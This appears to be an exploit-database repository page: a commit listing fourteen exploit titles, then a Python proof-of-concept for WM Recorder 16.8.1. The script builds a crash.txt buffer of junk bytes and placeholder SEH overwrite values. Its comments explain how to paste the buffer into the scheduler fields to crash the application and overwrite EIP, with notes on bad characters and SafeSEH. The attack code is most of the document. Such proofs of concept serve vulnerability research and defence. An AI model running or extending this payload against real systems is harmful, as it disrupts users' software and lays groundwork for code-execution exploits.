e3fb91f1d7
14 changes to exploits/shellcodes Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Dell EMC NetWorker - Denial of Service WM Recorder 16.8.1 - Denial of Service Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve ) Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH) Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery XenForo 2 - CSS Loader Denial of Service MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion Linux/x86 - EggHunter Shellcode (11 Bytes)
37 lines
No EOL
951 B
Python
Executable file
37 lines
No EOL
951 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
#
|
|
# Exploit Author: bzyo
|
|
# Twitter: @bzyo_
|
|
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
|
|
# Date: 03-20-2018
|
|
# Vulnerable Software: WM Recorder 16.8.1
|
|
# Vendor Homepage: http://wmrecorder.com/home/
|
|
# Version: 16.8.1
|
|
# Software Link: http://wmrecorder.com/download/wm-recorder/
|
|
# Tested On: Windows 7 x86/x64, Windows 10 x64
|
|
#
|
|
#
|
|
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
|
|
# change End Recording date to future date, turn scheduler on, select OK
|
|
#
|
|
# app crashes & EIP overwrite;
|
|
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
|
|
# lots of bad chars including \x90
|
|
#
|
|
|
|
filename="crash.txt"
|
|
|
|
junk = "\x41"*429
|
|
|
|
nseh = "\x42"*4
|
|
|
|
seh = "\x43"*4
|
|
|
|
fill = "\x44"*9562
|
|
|
|
buffer = junk + nseh + seh + fill
|
|
|
|
textfile = open(filename , 'w')
|
|
textfile.write(buffer)
|
|
textfile.close() |